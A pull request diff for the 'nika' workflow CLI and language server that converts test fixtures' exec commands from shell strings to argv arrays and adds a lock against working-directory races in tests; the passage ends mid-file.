### PR TITLE
feat!(exec): the language tightens — argv|shell by field · the envelope is not a value

### DIFF
--- a/crates/nika-cli/src/verbs/check.rs
+++ b/crates/nika-cli/src/verbs/check.rs
@@ -1299,7 +1299,7 @@ mod tests {
     /// the exit code must agree (the review-swarm untested-branch gap).
     #[test]
     fn native_strict_json_payload_agrees_with_the_exit_code() {
-        let helper = "nika: v1\nworkflow: helper\ntasks:\n  - id: crawl\n    exec: { command: \"curl -s https://acme.test\" }\n";
+        let helper = "nika: v1\nworkflow: helper\ntasks:\n  - id: crawl\n    exec: { command: [\"curl\", \"-s\", \"https://acme.test\"] }\n";
         // Per-PROCESS dir: two concurrent `cargo test` invocations (a CI
         // matrix · a dev double-run) share the OS tmpdir, and a fixed
         // name let them stomp each other's fixtures mid-read (flaked
@@ -1335,7 +1335,7 @@ mod tests {
     /// 0 under strict.
     #[test]
     fn native_strict_fails_on_native_first_hints_only() {
-        let helper = "nika: v1\nworkflow: helper\ntasks:\n  - id: crawl\n    exec: { command: \"curl -s https://acme.test\" }\n";
+        let helper = "nika: v1\nworkflow: helper\ntasks:\n  - id: crawl\n    exec: { command: [\"curl\", \"-s\", \"https://acme.test\"] }\n";
         let default_run = checked_output("native-default.nika.yaml", helper, false);
         assert_eq!(
             default_run.code, 0,
@@ -1394,7 +1394,7 @@ mod tests {
     fn clean_report_marks_every_section() {
         let text = checked_text(
             "clean-one.nika.yaml",
-            "nika: v1\nworkflow: clean-one\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n",
+            "nika: v1\nworkflow: clean-one\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n",
             false,
         );
         let ticks = text.matches('✔').count();
@@ -1413,7 +1413,7 @@ mod tests {
     /// ASCII parity (`ok audited` · `>=`).
     #[test]
     fn clean_verdict_is_the_audited_card_line() {
-        let yaml = "nika: v1\nworkflow: card\nmodel: mock/echo\ntasks:\n  - id: a\n    exec: { command: \"echo hi\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo bye\" }\n";
+        let yaml = "nika: v1\nworkflow: card\nmodel: mock/echo\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"hi\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"bye\"] }\n";
         let text = checked_text("audited-card.nika.yaml", yaml, false);
         assert!(
             text.contains("✔ audited · 2 tasks · 2 waves · permits none · est ≥$0.0000 · 1 hint"),
@@ -1460,7 +1460,7 @@ mod tests {
     fn plan_announces_the_skip_when_conformance_fails() {
         let text = checked_text(
             "plan-skip.nika.yaml",
-            "nika: v1\nworkflow: bad-ref\ntasks:\n  - id: a\n    exec: { command: \"echo ${{ vars.nope }}\" }\n",
+            "nika: v1\nworkflow: bad-ref\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"${{ vars.nope }}\"] }\n",
             true,
         );
         assert!(

--- a/crates/nika-cli/src/verbs/context.rs
+++ b/crates/nika-cli/src/verbs/context.rs
@@ -342,7 +342,7 @@ mod tests {
         // `when:` as a bare string = a conformance finding.
         std::fs::write(
             dir.join("flows/bad.nika.yaml"),
-            "nika: v1\nworkflow: bad\ntasks:\n  - id: a\n    exec: { command: \"echo x\" }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: \"echo y\" }\n",
+            "nika: v1\nworkflow: bad\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"x\"] }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
         )
         .expect("write");
         // Hidden from the walk: dependency tree.

--- a/crates/nika-cli/src/verbs/explain_file.rs
+++ b/crates/nika-cli/src/verbs/explain_file.rs
@@ -682,7 +682,7 @@ mod tests {
         // must refuse to narrate and hand over to check (exit 2).
         let path = tmp(
             "dirty",
-            "nika: v1\nworkflow: dirty\ntasks:\n  - id: a\n    exec: { command: \"echo x\" }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: \"echo y\" }\n",
+            "nika: v1\nworkflow: dirty\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"x\"] }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
         );
         let out = run(path.to_str().expect("utf8"), false, false);
         std::fs::remove_file(&path).ok();
@@ -767,7 +767,7 @@ mod tests {
     use nika_types::resource::Value;
     use std::time::Duration;
 
-    const FC: &str = "nika: v1\nworkflow: fc-fix\ndescription: forecast fixture\n\nmodel: mock/echo\n\ntasks:\n  - id: fetch\n    exec: { command: \"echo x\" }\n  - id: think\n    depends_on: [fetch]\n    infer: { prompt: \"p\", max_tokens: 10 }\n";
+    const FC: &str = "nika: v1\nworkflow: fc-fix\ndescription: forecast fixture\n\nmodel: mock/echo\n\ntasks:\n  - id: fetch\n    exec: { command: [\"echo\", \"x\"] }\n  - id: think\n    depends_on: [fetch]\n    infer: { prompt: \"p\", max_tokens: 10 }\n";
 
     /// One completed fc-fix run body: fetch (exec) + think (infer),
     /// distinct durations, optional sha/model/extras.

--- a/crates/nika-cli/src/verbs/inspect.rs
+++ b/crates/nika-cli/src/verbs/inspect.rs
@@ -408,7 +408,7 @@ mod tests {
     #[test]
     fn fan_out_groups_the_wave_and_truncates_the_witness() {
         let path = tmp(
-            "nika: v1\nworkflow: fan5\ntasks:\n  - id: root\n    exec: { command: \"echo r\" }\n  - id: c1\n    depends_on: [root]\n    exec: { command: \"echo 1\" }\n  - id: c2\n    depends_on: [root]\n    exec: { command: \"echo 2\" }\n  - id: c3\n    depends_on: [root]\n    exec: { command: \"echo 3\" }\n  - id: c4\n    depends_on: [root]\n    exec: { command: \"echo 4\" }\n  - id: c5\n    depends_on: [root]\n    exec: { command: \"echo 5\" }\n",
+            "nika: v1\nworkflow: fan5\ntasks:\n  - id: root\n    exec: { command: [\"echo\", \"r\"] }\n  - id: c1\n    depends_on: [root]\n    exec: { command: [\"echo\", \"1\"] }\n  - id: c2\n    depends_on: [root]\n    exec: { command: [\"echo\", \"2\"] }\n  - id: c3\n    depends_on: [root]\n    exec: { command: [\"echo\", \"3\"] }\n  - id: c4\n    depends_on: [root]\n    exec: { command: [\"echo\", \"4\"] }\n  - id: c5\n    depends_on: [root]\n    exec: { command: [\"echo\", \"5\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),
@@ -455,7 +455,7 @@ mod tests {
     #[test]
     fn ascii_theme_draws_the_same_waves() {
         let path = tmp(
-            "nika: v1\nworkflow: fanscii\ntasks:\n  - id: root\n    exec: { command: \"echo r\" }\n  - id: c1\n    depends_on: [root]\n    exec: { command: \"echo 1\" }\n  - id: c2\n    depends_on: [root]\n    exec: { command: \"echo 2\" }\n",
+            "nika: v1\nworkflow: fanscii\ntasks:\n  - id: root\n    exec: { command: [\"echo\", \"r\"] }\n  - id: c1\n    depends_on: [root]\n    exec: { command: [\"echo\", \"1\"] }\n  - id: c2\n    depends_on: [root]\n    exec: { command: [\"echo\", \"2\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),
@@ -494,7 +494,7 @@ mod tests {
     #[test]
     fn width_four_has_no_ellipsis_and_blast_caps_at_three() {
         let path = tmp(
-            "nika: v1\nworkflow: wide-diamond\ntasks:\n  - id: root\n    exec: { command: \"echo r\" }\n  - id: m1\n    depends_on: [root]\n    exec: { command: \"echo 1\" }\n  - id: m2\n    depends_on: [root]\n    exec: { command: \"echo 2\" }\n  - id: m3\n    depends_on: [root]\n    exec: { command: \"echo 3\" }\n  - id: m4\n    depends_on: [root]\n    exec: { command: \"echo 4\" }\n  - id: join\n    depends_on: [m1, m2, m3, m4]\n    exec: { command: \"echo j\" }\n",
+            "nika: v1\nworkflow: wide-diamond\ntasks:\n  - id: root\n    exec: { command: [\"echo\", \"r\"] }\n  - id: m1\n    depends_on: [root]\n    exec: { command: [\"echo\", \"1\"] }\n  - id: m2\n    depends_on: [root]\n    exec: { command: [\"echo\", \"2\"] }\n  - id: m3\n    depends_on: [root]\n    exec: { command: [\"echo\", \"3\"] }\n  - id: m4\n    depends_on: [root]\n    exec: { command: [\"echo\", \"4\"] }\n  - id: join\n    depends_on: [m1, m2, m3, m4]\n    exec: { command: [\"echo\", \"j\"] }\n",
         );
         let out = run(
             path.to_str().expect("utf-8 tmp path"),

--- a/crates/nika-cli/src/verbs/run/compose.rs
+++ b/crates/nika-cli/src/verbs/run/compose.rs
@@ -805,7 +805,7 @@ mod tests {
         // (a) no permits block → Unbounded (the SSRF floor is the only guard).
         assert_eq!(
             net_boundary_of(&parse(
-                "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: \"echo hi\" }\n"
+                "nika: v1\nworkflow: w\ntasks:\n  - id: t\n    exec: { command: [\"echo\", \"hi\"] }\n"
             )),
             NetBoundary::Unbounded
         );

--- a/crates/nika-cli/src/verbs/run/heartbeat.rs
+++ b/crates/nika-cli/src/verbs/run/heartbeat.rs
@@ -286,7 +286,7 @@ mod tests {
     /// stays bare.
     #[test]
     fn task_labels_speak_the_static_truth() {
-        let yaml = "nika: v1\nworkflow: t\nmodel: ollama/qwen3.5:4b\ntasks:\n  - id: think\n    infer: { prompt: hi }\n  - id: pinned\n    infer: { prompt: hi, model: \"mock/echo\" }\n  - id: fetch\n    invoke: { tool: \"nika:fetch\", args: { url: \"https://example.com\" } }\n  - id: build\n    exec: { command: \"sleep 1\" }\n";
+        let yaml = "nika: v1\nworkflow: t\nmodel: ollama/qwen3.5:4b\ntasks:\n  - id: think\n    infer: { prompt: hi }\n  - id: pinned\n    infer: { prompt: hi, model: \"mock/echo\" }\n  - id: fetch\n    invoke: { tool: \"nika:fetch\", args: { url: \"https://example.com\" } }\n  - id: build\n    exec: { command: [\"sleep\", \"1\"] }\n";
         let wf = nika_schema::parse(
             yaml,
             nika_schema::FileId::new(0),

--- a/crates/nika-cli/src/verbs/run/inputs.rs
+++ b/crates/nika-cli/src/verbs/run/inputs.rs
@@ -98,7 +98,7 @@ mod tests {
     #[test]
     fn parse_var_overrides_types_json_else_string() {
         let wf = parse(
-            "nika: v1\nworkflow: t\nvars:\n  topic: { type: string, required: true }\n  limit: { type: integer, default: 3 }\n  flags: [\"a\"]\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: t\nvars:\n  topic: { type: string, required: true }\n  limit: { type: integer, default: 3 }\n  flags: [\"a\"]\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n",
         );
 
         // string verbatim · integer typed · untyped JSON-guess (array).
@@ -131,7 +131,7 @@ mod tests {
         // CONTRACT — the CLI value must honor it, not be embedded
         // type-blind (`count=notanumber` used to ride through as a string).
         let wf = parse(
-            "nika: v1\nworkflow: t\nvars:\n  count: { type: integer, required: true }\n  ratio: { type: number, default: 1.0 }\n  on: { type: boolean, default: false }\n  name: { type: string, required: true }\ntasks:\n  - id: t\n    exec: { command: \"true\" }\n",
+            "nika: v1\nworkflow: t\nvars:\n  count: { type: integer, required: true }\n  ratio: { type: number, default: 1.0 }\n  on: { type: boolean, default: false }\n  name: { type: string, required: true }\ntasks:\n  - id: t\n    exec: { command: [\"true\"] }\n",
         );
 
         // The type DRIVES the parse — well-typed values land as their type.

--- a/crates/nika-cli/src/verbs/run/resume.rs
+++ b/crates/nika-cli/src/verbs/run/resume.rs
@@ -257,7 +257,7 @@ mod tests {
 
     #[test]
     fn from_removes_the_task_and_its_transitive_downstream() {
-        const WF: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: \"true\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"true\" }\n  - id: c\n    exec: { command: \"echo ${{ tasks.b.output }}\" }\n  - id: solo\n    exec: { command: \"true\" }\n";
+        const WF: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: [\"true\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"true\"] }\n  - id: c\n    exec: { command: [\"echo\", \"${{ tasks.b.output }}\"] }\n  - id: solo\n    exec: { command: [\"true\"] }\n";
         let wf = nika_schema::parse(
             WF,
             nika_schema::FileId::new(0),
@@ -295,7 +295,7 @@ mod tests {
 
     #[test]
     fn answers_bind_only_known_prompt_tasks() {
-        const WF: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: ask\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"confirm\", message: \"go?\" }\n  - id: build\n    exec: { command: \"true\" }\n";
+        const WF: &str = "nika: v1\nworkflow: t\ntasks:\n  - id: ask\n    invoke:\n      tool: \"nika:prompt\"\n      args: { mode: \"confirm\", message: \"go?\" }\n  - id: build\n    exec: { command: [\"true\"] }\n";
         let wf = nika_schema::parse(
             WF,
             nika_schema::FileId::new(0),

--- a/crates/nika-cli/tests/bin_smoke.rs
+++ b/crates/nika-cli/tests/bin_smoke.rs
@@ -47,7 +47,7 @@ nika: v1
 workflow: smoke
 tasks:
   - id: greet
-    exec: { command: "echo hello" }
+    exec: { command: ["echo", "hello"] }
 "#;
 
 const INVALID: &str = r#"
@@ -56,10 +56,10 @@ workflow: smoke-broken
 tasks:
   - id: a
     depends_on: [b]
-    exec: { command: "true" }
+    exec: { command: ["true"] }
   - id: b
     depends_on: [a]
-    exec: { command: "true" }
+    exec: { command: ["true"] }
 "#;
 
 const FAILING: &str = r#"
@@ -67,7 +67,7 @@ nika: v1
 workflow: smoke-fail
 tasks:
   - id: boom
-    exec: { command: "exit 7" }
+    exec: { shell: "exit 7" }
 "#;
 
 #[test]
@@ -1198,7 +1198,7 @@ fn lsp_survives_adversarial_request_positions_over_stdio() {
     use std::process::Stdio;
     // butterfly + é in a value, a multibyte task id — every position below
     // lands in, or past, one of this document's multibyte spans.
-    let multi = "nika: v1\nworkflow: 🦋é\ntasks:\n  - id: café\n    exec: { command: \"echo ${{ tasks.café.output }}\" }\n";
+    let multi = "nika: v1\nworkflow: 🦋é\ntasks:\n  - id: café\n    exec: { command: [\"echo\", \"${{ tasks.café.output }}\"] }\n";
     let uri = "file:///t/multi.nika.yaml";
     let max = u32::MAX;
     let mut child = bin()
@@ -1309,7 +1309,7 @@ fn context_aggregates_the_workspace_value_free() {
     write_fixture(
         &dir.join("flows"),
         "bad.nika.yaml",
-        "nika: v1\nworkflow: smoke-bad\ntasks:\n  - id: a\n    exec: { command: \"echo x\" }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: \"echo y\" }\n",
+        "nika: v1\nworkflow: smoke-bad\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"x\"] }\n  - id: b\n    depends_on: [a]\n    when: maybe\n    exec: { command: [\"echo\", \"y\"] }\n",
     );
     let out = bin()
         .args(["welcome", "--deep"])

--- a/crates/nika-cli/tests/e2e_pipeline.rs
+++ b/crates/nika-cli/tests/e2e_pipeline.rs
@@ -75,7 +75,7 @@ tasks:
 
   - id: probe
     exec:
-      command: "wc -l ./news.json"
+      command: ["wc", "-l", "./news.json"]
 
   - id: extract
     depends_on: [gather]
@@ -106,7 +106,7 @@ tasks:
     depends_on: [write_out]
     when: ${{ vars.publish == 'yes' }}
     exec:
-      command: "echo done"
+      command: ["echo", "done"]
 
 outputs:
   report: ${{ tasks.write_out.output }}

--- a/crates/nika-cli/tests/forecast_e2e.rs
+++ b/crates/nika-cli/tests/forecast_e2e.rs
@@ -37,7 +37,7 @@ model: mock/echo
 tasks:
   - id: probe
     exec:
-      command: "echo ready"
+      command: ["echo", "ready"]
 
   - id: think
     depends_on: [probe]

--- a/crates/nika-cli/tests/forecast_e2e.rs
+++ b/crates/nika-cli/tests/forecast_e2e.rs
@@ -96,13 +96,20 @@ fn stage_runs(dir: &Path, events: &[Event], n: usize) {
     }
 }
 
+/// `set_current_dir` is PROCESS-global: the two tests race on it under
+/// the parallel test runner (one test's TempDir drops under the other's
+/// feet — masked by timing until the 0.103 fixture migration shifted
+/// it). Every arena user holds this lock for its whole cwd section.
+static CWD_LOCK: std::sync::Mutex<()> = std::sync::Mutex::new(());
+
 /// The workflow file + the cwd dance shared by both tests.
-fn arena(events: &[Event], runs: usize) -> tempfile::TempDir {
+fn arena(events: &[Event], runs: usize) -> (std::sync::MutexGuard<'static, ()>, tempfile::TempDir) {
+    let guard = CWD_LOCK.lock().unwrap_or_else(std::sync::PoisonError::into_inner);
     let dir = tempfile::tempdir().expect("arena");
     std::fs::write(dir.path().join("fc-e2e.nika.yaml"), WORKFLOW).expect("wf written");
     stage_runs(dir.path(), events, runs);
     std::env::set_current_dir(dir.path()).expect("cwd into arena");
-    dir
+    (guard, dir)
 }
 
 #[tokio::test]

--- a/crates/nika-cli/tests/resume_e2e.rs
+++ b/crates/nika-cli/tests/resume_e2e.rs
@@ -69,10 +69,10 @@ nika: v1
 workflow: resume-chain
 tasks:
   - id: a
-    exec: { command: "echo alpha" }
+    exec: { command: ["echo", "alpha"] }
   - id: b
     depends_on: [a]
-    exec: { command: "echo beta ${{ tasks.a.output }}" }
+    exec: { command: ["echo", "beta", "${{ tasks.a.output }}"] }
 outputs:
   built: ${{ tasks.b.output }}
 "#;
@@ -174,9 +174,9 @@ vars:
   topic: { type: string, default: "news" }
 tasks:
   - id: uses_var
-    exec: { command: "echo about ${{ vars.topic }}" }
+    exec: { command: ["echo", "about", "${{ vars.topic }}"] }
   - id: sibling
-    exec: { command: "echo steady" }
+    exec: { command: ["echo", "steady"] }
 "#;
 
 #[test]
@@ -258,7 +258,7 @@ nika: v1
 workflow: resume-gated
 tasks:
   - id: prep
-    exec: { command: "echo staged" }
+    exec: { command: ["echo", "staged"] }
   - id: approve
     depends_on: [prep]
     invoke:
@@ -266,7 +266,7 @@ tasks:
       args: { mode: "input", message: "ship it?" }
   - id: ship
     depends_on: [approve]
-    exec: { command: "echo shipping ${{ tasks.approve.output }}" }
+    exec: { command: ["echo", "shipping", "${{ tasks.approve.output }}"] }
 "#;
 
 #[test]

--- a/crates/nika-cli/tests/run_verb.rs
+++ b/crates/nika-cli/tests/run_verb.rs
@@ -32,10 +32,10 @@ nika: v1
 workflow: run-ok
 tasks:
   - id: greet
-    exec: { command: "echo hello" }
+    exec: { command: ["echo", "hello"] }
   - id: after
     depends_on: [greet]
-    exec: { command: "echo done" }
+    exec: { command: ["echo", "done"] }
 "#;
 
 const FAILING: &str = r#"
@@ -43,7 +43,7 @@ nika: v1
 workflow: run-fail
 tasks:
   - id: boom
-    exec: { command: "false" }
+    exec: { command: ["false"] }
 "#;
 
 const CYCLE: &str = r#"
@@ -52,10 +52,10 @@ workflow: run-cycle
 tasks:
   - id: a
     depends_on: [b]
-    exec: { command: "true" }
+    exec: { command: ["true"] }
   - id: b
     depends_on: [a]
-    exec: { command: "true" }
+    exec: { command: ["true"] }
 "#;
 
 const INFER: &str = r#"

--- a/crates/nika-cli/tests/verbs_static.rs
+++ b/crates/nika-cli/tests/verbs_static.rs
@@ -32,7 +32,7 @@ tasks:
 
   - id: probe
     exec:
-      command: "wc -l ./news.json"
+      command: ["wc", "-l", "./news.json"]
 
   - id: fan
     depends_on: [gather]
@@ -51,7 +51,7 @@ tasks:
     depends_on: [think]
     when: ${{ vars.source != '' }}
     exec:
-      command: "echo done"
+      command: ["echo", "done"]
 "#;
 
 /// Write the fixture to a temp file owned by this test run.

--- a/crates/nika-lsp/src/analysis/code_action.rs
+++ b/crates/nika-lsp/src/analysis/code_action.rs
@@ -214,7 +214,7 @@ mod tests {
     /// quickfix whose edit slices exactly the offending token.
     #[test]
     fn an_unknown_dependency_offers_the_did_you_mean_rename() {
-        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: gather\n    exec: { command: \"true\" }\n  - id: think\n    depends_on: [gathr]\n    exec: { command: \"true\" }\n";
+        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: gather\n    exec: { command: [\"true\"] }\n  - id: think\n    depends_on: [gathr]\n    exec: { command: [\"true\"] }\n";
         let acts = actions(text);
         assert_eq!(acts.len(), 1, "one typed rename");
         let edit = first_edit(&acts[0]);
@@ -228,7 +228,7 @@ mod tests {
     /// A finding with no suggestion offers NOTHING (silence beats a guess).
     #[test]
     fn no_suggestion_means_no_action() {
-        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: \"${{ tasks.zzzzzz.output }}\" }\n";
+        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: a\n    exec: { command: [\"${{ tasks.zzzzzz.output }}\"] }\n";
         // `zzzzzz` is nowhere near any declared name — no did-you-mean.
         assert!(actions(text).is_empty());
     }
@@ -249,7 +249,7 @@ mod tests {
     /// The lightbulb only lights where the finding lives.
     #[test]
     fn actions_off_the_requested_range_stay_silent() {
-        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: gather\n    exec: { command: \"true\" }\n  - id: think\n    depends_on: [gathr]\n    exec: { command: \"true\" }\n";
+        let text = "nika: v1\nworkflow: t\ntasks:\n  - id: gather\n    exec: { command: [\"true\"] }\n  - id: think\n    depends_on: [gathr]\n    exec: { command: [\"true\"] }\n";
         let top = Range {
             start: lsp_types::Position {
                 line: 0,

--- a/crates/nika-lsp/src/analysis/completion/tests.rs
+++ b/crates/nika-lsp/src/analysis/completion/tests.rs
@@ -108,7 +108,7 @@ fn provider_slash_offers_that_providers_models() {
 /// Closed-enum fields offer exactly the spec's vocabulary.
 #[test]
 fn enum_fields_offer_exactly_the_closed_sets() {
-    let text = "nika: v1\ntasks:\n  - id: a\n    exec:\n      command: x\n      capture: ";
+    let text = "nika: v1\ntasks:\n  - id: a\n    exec:\n      command: [\"x\"]\n      capture: ";
     let labels_ = labels(&completion(text, text.len()));
     assert_eq!(labels_, vec!["text".to_owned(), "structured".to_owned()]);
 
@@ -229,7 +229,7 @@ fn model_value_after_a_space_separated_token_offers_nothing() {
 fn depends_on_offers_exactly_the_task_ids() {
     // The partially-typed `depends_on: [` does not parse → the scan path
     // yields the ids with detail "task" and VARIABLE kind. EXACT set.
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [";
     let items = completion(text, text.len());
     assert_eq!(
         labels(&items),
@@ -255,7 +255,7 @@ fn depends_on_in_a_parseable_doc_uses_the_verb_detail() {
     // parse path wins, so each id carries its verb in the detail
     // (`task (exec)`) — the `!wf.tasks.is_empty()` guard + the label/
     // kind/detail fields of the parse-path CompletionItem.
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [extract]\n    exec: { command: \"y\" }\n";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [extract]\n    exec: { command: [\"y\"] }\n";
     let cursor = text
         .find("depends_on: [")
         .map(|p| p + "depends_on: [".len())
@@ -284,7 +284,7 @@ fn closed_depends_on_after_the_bracket_does_not_offer_task_ids() {
     // The `[` is BALANCED by `]` — the cursor sits after a fully closed
     // depends_on. `in_open_depends_on` must be FALSE (counts equal, not
     // `>=`), so no task-id completion fires here.
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [extract] ";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [extract] ";
     let items = completion(text, text.len());
     assert!(
         !labels(&items).iter().any(|l| l == "extract" || l == "save"),
@@ -297,7 +297,7 @@ fn closed_depends_on_after_the_bracket_does_not_offer_task_ids() {
 fn depends_on_offers_task_ids_across_lines() {
     // a multi-line flow list: the cursor is on a continuation line, the
     // `depends_on:` key + unclosed `[` are on PREVIOUS lines.
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: \"x\" }\n  - id: save\n    depends_on: [\n      extract,\n      ";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: extract\n    exec: { command: [\"x\"] }\n  - id: save\n    depends_on: [\n      extract,\n      ";
     let items = completion(text, text.len());
     let labels = labels(&items);
     assert!(labels.contains(&"extract".to_owned()), "{labels:?}");
@@ -601,7 +601,7 @@ fn scan_task_ids_reads_underscored_ids_in_full() {
     // The scan-path take_while keeps `_` and alnum. An id with an
     // underscore (`my_task`) must be read in FULL (flipping the `==` in
     // the take_while predicate would stop at the `_`, truncating to `my`).
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: my_task\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: my_task\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [";
     let items = completion(text, text.len());
     assert_eq!(
         labels(&items),
@@ -645,7 +645,7 @@ fn scan_task_ids_dedups_and_reads_in_order() {
     // (`!id.is_empty() && !ids.contains(&id)` — the `&&` and the `==` in
     // the take_while predicate both matter.) A duplicate id must appear
     // ONCE; the order is source order.
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: first\n    exec: { command: \"x\" }\n  - id: second\n    exec: { command: \"y\" }\n  - id: first\n    exec: { command: \"z\" }\n  - id: editor\n    depends_on: [";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: first\n    exec: { command: [\"x\"] }\n  - id: second\n    exec: { command: [\"y\"] }\n  - id: first\n    exec: { command: [\"z\"] }\n  - id: editor\n    depends_on: [";
     let items = completion(text, text.len());
     assert_eq!(
         labels(&items),
@@ -739,7 +739,7 @@ fn fetch_mode_offers_the_stdlib_extract_vocabulary() {
 /// block scan — names still arrive, detail goes generic.
 #[test]
 fn island_vars_offer_the_declared_names() {
-    let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n    required: true\n    description: target city\n  out_dir: \"./out\"\ntasks:\n  - id: a\n    exec: { command: \"echo ${{ vars.city }}\" }\n";
+    let text = "nika: v1\nworkflow: w\nvars:\n  city:\n    type: string\n    required: true\n    description: target city\n  out_dir: \"./out\"\ntasks:\n  - id: a\n    exec: { command: [\"echo\", \"${{ vars.city }}\"] }\n";
     let cursor = text.find("${{ vars.").expect("island") + "${{ vars.".len();
     let items = completion(text, cursor);
     let got = labels(&items);
@@ -779,7 +779,7 @@ fn island_secrets_and_env_offer_declared_names() {
 /// diamond a → {b, c} → d, task `b`'s island offers exactly `a`.
 #[test]
 fn island_tasks_offer_only_the_declared_edges() {
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"echo ${{ tasks.a.output }}\" }\n  - id: c\n    depends_on: [a]\n    exec: { command: \"x\" }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: \"x\" }\n";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"echo\", \"${{ tasks.a.output }}\"] }\n  - id: c\n    depends_on: [a]\n    exec: { command: [\"x\"] }\n  - id: d\n    depends_on: [b, c]\n    exec: { command: [\"x\"] }\n";
     // cursor mid-island inside task b (document parses whole)
     let cursor = text.find("${{ tasks.").expect("island") + "${{ tasks.".len();
     let got = labels(&completion(text, cursor));
@@ -800,7 +800,7 @@ fn island_tasks_offer_only_the_declared_edges() {
 /// its downstream closure — the deadlock set.
 #[test]
 fn recover_island_offers_the_dag004_legal_set() {
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: cached\n    exec: { command: \"echo fallback\" }\n  - id: live\n    exec:\n      command: \"false\"\n    on_error:\n      recover: \"${{ tasks.cached.output }}\"\n  - id: after\n    depends_on: [live]\n    exec: { command: \"x\" }\n";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: cached\n    exec: { command: [\"echo\", \"fallback\"] }\n  - id: live\n    exec:\n      command: [\"false\"]\n    on_error:\n      recover: \"${{ tasks.cached.output }}\"\n  - id: after\n    depends_on: [live]\n    exec: { command: [\"x\"] }\n";
     let cursor = text.find("${{ tasks.").expect("island") + "${{ tasks.".len();
     let got = labels(&completion(text, cursor));
     assert_eq!(
@@ -814,7 +814,7 @@ fn recover_island_offers_the_dag004_legal_set() {
 /// task is legal there (probed green at the binary).
 #[test]
 fn outputs_island_offers_every_task() {
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: \"x\" }\n  - id: b\n    depends_on: [a]\n    exec: { command: \"y\" }\noutputs:\n  first: \"${{ tasks.";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: a\n    exec: { command: [\"x\"] }\n  - id: b\n    depends_on: [a]\n    exec: { command: [\"y\"] }\noutputs:\n  first: \"${{ tasks.";
     let got = labels(&completion(text, text.len()));
     assert_eq!(got, vec!["a", "b"], "outside a task, all ids: {got:?}");
 }
@@ -860,7 +860,7 @@ fn an_abandoned_open_bracket_upstream_captures_nothing() {
 
 #[test]
 fn task_member_island_teaches_the_three_facts_and_the_bindings() {
-    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: gather\n    exec:\n      command: ls\n    output:\n      first_line: \".stdout\"\n  - id: use\n    depends_on: [gather]\n    when: ${{ tasks.gather.";
+    let text = "nika: v1\nworkflow: w\ntasks:\n  - id: gather\n    exec:\n      command: [\"ls\"]\n    output:\n      first_line: \".stdout\"\n  - id: use\n    depends_on: [gather]\n    when: ${{ tasks.gather.";
     let got = labels(&completion(text, text.len()));
     assert!(
         got.contains(&"output".to_owned())
@@ -885,7 +885,7 @@ fn task_member_island_teaches_the_three_facts_and_the_bindings() {
 
 #[test]
 fn task_member_island_survives_an_unknown_id() {
